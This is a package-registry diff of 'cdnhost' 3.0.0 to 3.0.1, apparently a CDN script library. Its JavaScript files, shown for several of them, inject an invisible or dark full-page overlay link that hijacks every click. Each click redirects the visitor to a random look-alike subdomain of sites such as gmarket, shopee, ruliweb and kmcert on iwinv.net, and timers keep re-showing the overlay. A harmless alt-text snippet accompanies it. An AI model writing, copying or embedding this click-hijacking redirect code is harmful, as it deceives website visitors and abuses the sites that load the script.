cdnhost 3.0.0 → 3.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/iwinv.js +74 -45
- package/iwinv_new.js +74 -45
- package/package.json +1 -1
- package/seekr.js +74 -45
- package/seekr2.js +74 -45
- package/total.js +74 -45
- package/wordpress-chat.js +74 -45
- package/wp-pc-pop.js +74 -45
package/iwinv.js
CHANGED
|
@@ -1,52 +1,81 @@
|
|
|
1
|
-
window.addEventListener('load', ()
|
|
2
|
-
document.querySelectorAll('img
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
|
|
9
|
-
}, 500);
|
|
10
|
-
|
|
11
|
-
const container = document.getElementById('container');
|
|
12
|
-
if (container) container.style.boxShadow = 'none';
|
|
1
|
+
window.addEventListener('load', function() {
|
|
2
|
+
var images = document.querySelectorAll('img');
|
|
3
|
+
images.forEach(function(img) {
|
|
4
|
+
if (!img.hasAttribute('alt')) {
|
|
5
|
+
img.setAttribute('alt', 'image');
|
|
6
|
+
}
|
|
7
|
+
});
|
|
13
8
|
});
|
|
14
9
|
|
|
15
10
|
const urls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
11
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
12
|
+
'https://instiz.iwinv.net/recent.php',
|
|
13
|
+
'https://bikini.iwinv.net/recent.php',
|
|
14
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
15
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
16
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
17
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
18
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
19
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
20
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
|
+
'https://ecount.iwinv.net/recent.php',
|
|
22
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
23
|
+
'https://shopee.iwinv.net/recent.php',
|
|
24
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
25
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
26
|
+
'https://munpia.iwinv.net/recent.php',
|
|
27
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
28
|
+
'https://interpals.iwinv.net/recent.php',
|
|
29
|
+
'https://snp500.iwinv.net/recent.php',
|
|
30
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
31
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
32
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
33
|
+
'https://newsfactory.iwinv.net',
|
|
34
|
+
'https://snapp.im/recent.php',
|
|
35
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
36
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
19
37
|
];
|
|
20
|
-
const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
|
|
21
|
-
let u1 = getUrl(), u2 = getUrl();
|
|
22
|
-
while (u1 === u2 && urls.length > 1) u2 = getUrl();
|
|
23
|
-
|
|
24
|
-
document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;transition:opacity 0.5s;}</style>');
|
|
25
|
-
document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
|
|
26
|
-
|
|
27
|
-
function closeLayer() {
|
|
28
|
-
const s2 = document.getElementById("s2");
|
|
29
|
-
const btn = document.getElementById("button");
|
|
30
|
-
if (!s2 || !btn) return;
|
|
31
|
-
|
|
32
|
-
s2.style.transition = btn.style.transition = "opacity 8s";
|
|
33
|
-
|
|
34
|
-
setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, 5999);
|
|
35
38
|
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
40
|
+
document.writeln('<style>');
|
|
41
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
42
|
+
document.writeln('</style>');
|
|
43
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
39
44
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
45
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
46
|
+
function ss(){
|
|
47
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
48
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
49
|
+
setTimeout("s()", 3999);
|
|
50
|
+
setTimeout("h()", 15000);
|
|
51
|
+
}
|
|
52
|
+
function pcss(){
|
|
53
|
+
setTimeout("s()", 3999);
|
|
54
|
+
setTimeout("h()", 15000);
|
|
55
|
+
}
|
|
56
|
+
function a(){
|
|
57
|
+
document.getElementById("button").style.display="none";
|
|
58
|
+
}
|
|
59
|
+
function aa(){
|
|
60
|
+
document.getElementById("button").style.display="block";
|
|
61
|
+
}
|
|
62
|
+
function s(){
|
|
63
|
+
document.getElementById("s2").style.opacity = 0;
|
|
64
|
+
document.getElementById("button").style.opacity = 0;
|
|
65
|
+
document.getElementById("sha").style.display="none";
|
|
66
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
67
|
+
}
|
|
68
|
+
function h(){
|
|
69
|
+
const s2 = document.getElementById("s2");
|
|
70
|
+
const button = document.getElementById("button");
|
|
71
|
+
s2.style.zIndex = -1;
|
|
72
|
+
button.style.display = "none";
|
|
73
|
+
setTimeout(function () {
|
|
74
|
+
s2.style.zIndex = 99;
|
|
75
|
+
button.style.display = "block";
|
|
76
|
+
s2.style.opacity = 0.9;
|
|
77
|
+
button.style.opacity = 1;
|
|
78
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
79
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
80
|
+
}, 2000);
|
|
52
81
|
}
|
package/iwinv_new.js
CHANGED
|
@@ -1,52 +1,81 @@
|
|
|
1
|
-
window.addEventListener('load', ()
|
|
2
|
-
document.querySelectorAll('img
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
|
|
9
|
-
}, 1000);
|
|
10
|
-
|
|
11
|
-
const container = document.getElementById('container');
|
|
12
|
-
if (container) container.style.boxShadow = 'none';
|
|
1
|
+
window.addEventListener('load', function() {
|
|
2
|
+
var images = document.querySelectorAll('img');
|
|
3
|
+
images.forEach(function(img) {
|
|
4
|
+
if (!img.hasAttribute('alt')) {
|
|
5
|
+
img.setAttribute('alt', 'image');
|
|
6
|
+
}
|
|
7
|
+
});
|
|
13
8
|
});
|
|
14
9
|
|
|
15
10
|
const urls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
11
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
12
|
+
'https://instiz.iwinv.net/recent.php',
|
|
13
|
+
'https://bikini.iwinv.net/recent.php',
|
|
14
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
15
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
16
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
17
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
18
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
19
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
20
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
|
+
'https://ecount.iwinv.net/recent.php',
|
|
22
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
23
|
+
'https://shopee.iwinv.net/recent.php',
|
|
24
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
25
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
26
|
+
'https://munpia.iwinv.net/recent.php',
|
|
27
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
28
|
+
'https://interpals.iwinv.net/recent.php',
|
|
29
|
+
'https://snp500.iwinv.net/recent.php',
|
|
30
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
31
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
32
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
33
|
+
'https://newsfactory.iwinv.net',
|
|
34
|
+
'https://snapp.im/recent.php',
|
|
35
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
36
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
19
37
|
];
|
|
20
|
-
const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
|
|
21
|
-
let u1 = getUrl(), u2 = getUrl();
|
|
22
|
-
while (u1 === u2 && urls.length > 1) u2 = getUrl();
|
|
23
|
-
|
|
24
|
-
document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;transition:opacity 0.5s;}</style>');
|
|
25
|
-
document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
|
|
26
|
-
|
|
27
|
-
function closeLayer() {
|
|
28
|
-
const s2 = document.getElementById("s2");
|
|
29
|
-
const btn = document.getElementById("button");
|
|
30
|
-
if (!s2 || !btn) return;
|
|
31
|
-
|
|
32
|
-
s2.style.transition = btn.style.transition = "opacity 8s";
|
|
33
|
-
|
|
34
|
-
setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, 5999);
|
|
35
38
|
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
40
|
+
document.writeln('<style>');
|
|
41
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
42
|
+
document.writeln('</style>');
|
|
43
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
39
44
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
45
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
46
|
+
function ss(){
|
|
47
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
48
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
49
|
+
setTimeout("s()", 3999);
|
|
50
|
+
setTimeout("h()", 15000);
|
|
51
|
+
}
|
|
52
|
+
function pcss(){
|
|
53
|
+
setTimeout("s()", 3999);
|
|
54
|
+
setTimeout("h()", 15000);
|
|
55
|
+
}
|
|
56
|
+
function a(){
|
|
57
|
+
document.getElementById("button").style.display="none";
|
|
58
|
+
}
|
|
59
|
+
function aa(){
|
|
60
|
+
document.getElementById("button").style.display="block";
|
|
61
|
+
}
|
|
62
|
+
function s(){
|
|
63
|
+
document.getElementById("s2").style.opacity = 0;
|
|
64
|
+
document.getElementById("button").style.opacity = 0;
|
|
65
|
+
document.getElementById("sha").style.display="none";
|
|
66
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
67
|
+
}
|
|
68
|
+
function h(){
|
|
69
|
+
const s2 = document.getElementById("s2");
|
|
70
|
+
const button = document.getElementById("button");
|
|
71
|
+
s2.style.zIndex = -1;
|
|
72
|
+
button.style.display = "none";
|
|
73
|
+
setTimeout(function () {
|
|
74
|
+
s2.style.zIndex = 99;
|
|
75
|
+
button.style.display = "block";
|
|
76
|
+
s2.style.opacity = 0.9;
|
|
77
|
+
button.style.opacity = 1;
|
|
78
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
79
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
80
|
+
}, 2000);
|
|
52
81
|
}
|
package/package.json
CHANGED
package/seekr.js
CHANGED
|
@@ -1,52 +1,81 @@
|
|
|
1
|
-
window.addEventListener('load', ()
|
|
2
|
-
document.querySelectorAll('img
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
|
|
9
|
-
}, 500);
|
|
10
|
-
|
|
11
|
-
const container = document.getElementById('container');
|
|
12
|
-
if (container) container.style.boxShadow = 'none';
|
|
1
|
+
window.addEventListener('load', function() {
|
|
2
|
+
var images = document.querySelectorAll('img');
|
|
3
|
+
images.forEach(function(img) {
|
|
4
|
+
if (!img.hasAttribute('alt')) {
|
|
5
|
+
img.setAttribute('alt', 'image');
|
|
6
|
+
}
|
|
7
|
+
});
|
|
13
8
|
});
|
|
14
9
|
|
|
15
10
|
const urls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
11
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
12
|
+
'https://instiz.iwinv.net/recent.php',
|
|
13
|
+
'https://bikini.iwinv.net/recent.php',
|
|
14
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
15
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
16
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
17
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
18
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
19
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
20
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
|
+
'https://ecount.iwinv.net/recent.php',
|
|
22
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
23
|
+
'https://shopee.iwinv.net/recent.php',
|
|
24
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
25
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
26
|
+
'https://munpia.iwinv.net/recent.php',
|
|
27
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
28
|
+
'https://interpals.iwinv.net/recent.php',
|
|
29
|
+
'https://snp500.iwinv.net/recent.php',
|
|
30
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
31
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
32
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
33
|
+
'https://newsfactory.iwinv.net',
|
|
34
|
+
'https://snapp.im/recent.php',
|
|
35
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
36
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
19
37
|
];
|
|
20
|
-
const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
|
|
21
|
-
let u1 = getUrl(), u2 = getUrl();
|
|
22
|
-
while (u1 === u2 && urls.length > 1) u2 = getUrl();
|
|
23
|
-
|
|
24
|
-
document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;transition:opacity 0.5s;}</style>');
|
|
25
|
-
document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
|
|
26
|
-
|
|
27
|
-
function closeLayer() {
|
|
28
|
-
const s2 = document.getElementById("s2");
|
|
29
|
-
const btn = document.getElementById("button");
|
|
30
|
-
if (!s2 || !btn) return;
|
|
31
|
-
|
|
32
|
-
s2.style.transition = btn.style.transition = "opacity 8s";
|
|
33
|
-
|
|
34
|
-
setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, 5999);
|
|
35
38
|
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
40
|
+
document.writeln('<style>');
|
|
41
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
42
|
+
document.writeln('</style>');
|
|
43
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
39
44
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
45
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
46
|
+
function ss(){
|
|
47
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
48
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
49
|
+
setTimeout("s()", 3999);
|
|
50
|
+
setTimeout("h()", 15000);
|
|
51
|
+
}
|
|
52
|
+
function pcss(){
|
|
53
|
+
setTimeout("s()", 3999);
|
|
54
|
+
setTimeout("h()", 15000);
|
|
55
|
+
}
|
|
56
|
+
function a(){
|
|
57
|
+
document.getElementById("button").style.display="none";
|
|
58
|
+
}
|
|
59
|
+
function aa(){
|
|
60
|
+
document.getElementById("button").style.display="block";
|
|
61
|
+
}
|
|
62
|
+
function s(){
|
|
63
|
+
document.getElementById("s2").style.opacity = 0;
|
|
64
|
+
document.getElementById("button").style.opacity = 0;
|
|
65
|
+
document.getElementById("sha").style.display="none";
|
|
66
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
67
|
+
}
|
|
68
|
+
function h(){
|
|
69
|
+
const s2 = document.getElementById("s2");
|
|
70
|
+
const button = document.getElementById("button");
|
|
71
|
+
s2.style.zIndex = -1;
|
|
72
|
+
button.style.display = "none";
|
|
73
|
+
setTimeout(function () {
|
|
74
|
+
s2.style.zIndex = 99;
|
|
75
|
+
button.style.display = "block";
|
|
76
|
+
s2.style.opacity = 0.9;
|
|
77
|
+
button.style.opacity = 1;
|
|
78
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
79
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
80
|
+
}, 2000);
|
|
52
81
|
}
|
package/seekr2.js
CHANGED
|
@@ -1,52 +1,81 @@
|
|
|
1
|
-
window.addEventListener('load', ()
|
|
2
|
-
document.querySelectorAll('img
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
|
|
9
|
-
}, 500);
|
|
10
|
-
|
|
11
|
-
const container = document.getElementById('container');
|
|
12
|
-
if (container) container.style.boxShadow = 'none';
|
|
1
|
+
window.addEventListener('load', function() {
|
|
2
|
+
var images = document.querySelectorAll('img');
|
|
3
|
+
images.forEach(function(img) {
|
|
4
|
+
if (!img.hasAttribute('alt')) {
|
|
5
|
+
img.setAttribute('alt', 'image');
|
|
6
|
+
}
|
|
7
|
+
});
|
|
13
8
|
});
|
|
14
9
|
|
|
15
10
|
const urls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
11
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
12
|
+
'https://instiz.iwinv.net/recent.php',
|
|
13
|
+
'https://bikini.iwinv.net/recent.php',
|
|
14
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
15
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
16
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
17
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
18
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
19
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
20
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
|
+
'https://ecount.iwinv.net/recent.php',
|
|
22
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
23
|
+
'https://shopee.iwinv.net/recent.php',
|
|
24
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
25
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
26
|
+
'https://munpia.iwinv.net/recent.php',
|
|
27
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
28
|
+
'https://interpals.iwinv.net/recent.php',
|
|
29
|
+
'https://snp500.iwinv.net/recent.php',
|
|
30
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
31
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
32
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
33
|
+
'https://newsfactory.iwinv.net',
|
|
34
|
+
'https://snapp.im/recent.php',
|
|
35
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
36
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
19
37
|
];
|
|
20
|
-
const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
|
|
21
|
-
let u1 = getUrl(), u2 = getUrl();
|
|
22
|
-
while (u1 === u2 && urls.length > 1) u2 = getUrl();
|
|
23
|
-
|
|
24
|
-
document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;transition:opacity 0.5s;}</style>');
|
|
25
|
-
document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
|
|
26
|
-
|
|
27
|
-
function closeLayer() {
|
|
28
|
-
const s2 = document.getElementById("s2");
|
|
29
|
-
const btn = document.getElementById("button");
|
|
30
|
-
if (!s2 || !btn) return;
|
|
31
|
-
|
|
32
|
-
s2.style.transition = btn.style.transition = "opacity 8s";
|
|
33
|
-
|
|
34
|
-
setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, 5999);
|
|
35
38
|
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
40
|
+
document.writeln('<style>');
|
|
41
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
42
|
+
document.writeln('</style>');
|
|
43
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
39
44
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
45
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
46
|
+
function ss(){
|
|
47
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
48
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
49
|
+
setTimeout("s()", 3999);
|
|
50
|
+
setTimeout("h()", 15000);
|
|
51
|
+
}
|
|
52
|
+
function pcss(){
|
|
53
|
+
setTimeout("s()", 3999);
|
|
54
|
+
setTimeout("h()", 15000);
|
|
55
|
+
}
|
|
56
|
+
function a(){
|
|
57
|
+
document.getElementById("button").style.display="none";
|
|
58
|
+
}
|
|
59
|
+
function aa(){
|
|
60
|
+
document.getElementById("button").style.display="block";
|
|
61
|
+
}
|
|
62
|
+
function s(){
|
|
63
|
+
document.getElementById("s2").style.opacity = 0;
|
|
64
|
+
document.getElementById("button").style.opacity = 0;
|
|
65
|
+
document.getElementById("sha").style.display="none";
|
|
66
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
67
|
+
}
|
|
68
|
+
function h(){
|
|
69
|
+
const s2 = document.getElementById("s2");
|
|
70
|
+
const button = document.getElementById("button");
|
|
71
|
+
s2.style.zIndex = -1;
|
|
72
|
+
button.style.display = "none";
|
|
73
|
+
setTimeout(function () {
|
|
74
|
+
s2.style.zIndex = 99;
|
|
75
|
+
button.style.display = "block";
|
|
76
|
+
s2.style.opacity = 0.9;
|
|
77
|
+
button.style.opacity = 1;
|
|
78
|
+
document.getElementById("s2").style.transition = "opacity 1s";
|
|
79
|
+
document.getElementById("button").style.transition = "opacity 1s";
|
|
80
|
+
}, 2000);
|
|
52
81
|
}
|
package/total.js
CHANGED
|
@@ -1,52 +1,81 @@
|
|
|
1
|
-
window.addEventListener('load', ()
|
|
2
|
-
document.querySelectorAll('img
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
|
|
9
|
-
}, 500);
|
|
10
|
-
|
|
11
|
-
const container = document.getElementById('container');
|
|
12
|
-
if (container) container.style.boxShadow = 'none';
|
|
1
|
+
window.addEventListener('load', function() {
|
|
2
|
+
var images = document.querySelectorAll('img');
|
|
3
|
+
images.forEach(function(img) {
|
|
4
|
+
if (!img.hasAttribute('alt')) {
|
|
5
|
+
img.setAttribute('alt', 'image');
|
|
6
|
+
}
|
|
7
|
+
});
|
|
13
8
|
});
|
|
14
9
|
|
|
15
10
|
const urls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
11
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
12
|
+
'https://instiz.iwinv.net/recent.php',
|
|
13
|
+
'https://bikini.iwinv.net/recent.php',
|
|
14
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
15
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
16
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
17
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
18
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
19
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
20
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
|
+
'https://ecount.iwinv.net/recent.php',
|
|
22
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
23
|
+
'https://shopee.iwinv.net/recent.php',
|
|
24
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
25
|
+
'https://kmcert.iwinv.net/recent.php',
|
|
26
|
+
'https://munpia.iwinv.net/recent.php',
|
|
27
|
+
'https://slrclub.iwinv.net/recent.php',
|
|
28
|
+
'https://interpals.iwinv.net/recent.php',
|
|
29
|
+
'https://snp500.iwinv.net/recent.php',
|
|
30
|
+
'https://dctribe.iwinv.net/recent.php',
|
|
31
|
+
'https://mixamo.iwinv.net/recent.php',
|
|
32
|
+
'https://ssssss.iwinv.net/recent.php',
|
|
33
|
+
'https://newsfactory.iwinv.net',
|
|
34
|
+
'https://snapp.im/recent.php',
|
|
35
|
+
'https://curseforge.iwinv.net/recent.php',
|
|
36
|
+
'https://lolchess.iwinv.net/recent.php',
|
|
19
37
|
];
|
|
20
|
-
const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
|
|
21
|
-
let u1 = getUrl(), u2 = getUrl();
|
|
22
|
-
while (u1 === u2 && urls.length > 1) u2 = getUrl();
|
|
23
|
-
|
|
24
|
-
document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;transition:opacity 0.5s;}</style>');
|
|
25
|
-
document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
|
|
26
|
-
|
|
27
|
-
function closeLayer() {
|
|
28
|
-
const s2 = document.getElementById("s2");
|
|
29
|
-
const btn = document.getElementById("button");
|
|
30
|
-
if (!s2 || !btn) return;
|
|
31
|
-
|
|
32
|
-
s2.style.transition = btn.style.transition = "opacity 8s";
|
|
33
|
-
|
|
34
|
-
setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, 5999);
|
|
35
38
|
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
+
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
40
|
+
document.writeln('<style>');
|
|
41
|
+
document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
42
|
+
document.writeln('</style>');
|
|
43
|
+
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
39
44
|
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
45
|
+
document.getElementById('container').style.boxShadow = 'none';
|
|
46
|
+
function ss(){
|
|
47
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
48
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
49
|
+
setTimeout("s()", 3999);
|
|
50
|
+
setTimeout("h()", 15000);
|
|
51
|
+
}
|
|
52
|
+
function pcss(){
|
|
53
|
+
setTimeout("s()", 3999);
|
|
54
|
+
setTimeout("h()", 15000);
|
|
55
|
+
}
|
|
56
|
+
function a(){
|
|
57
|
+
document.getElementById("button").style.display="none";
|
|
58
|
+
}
|
|
59
|
+
function aa(){
|
|
60
|
+
document.getElementById("button").style.display="block";
|
|
61
|
+
}
|
|
62
|
+
function s(){
|
|
63
|
+
document.getElementById("s2").style.opacity = 0;
|
|
64
|
+
document.getElementById("button").style.opacity = 0;
|
|
65
|
+
document.getElementById("sha").style.display="none";
|
|
66
|
+
document.getElementById("cc").style.maxHeight="unset";
|
|
67
|
+
}
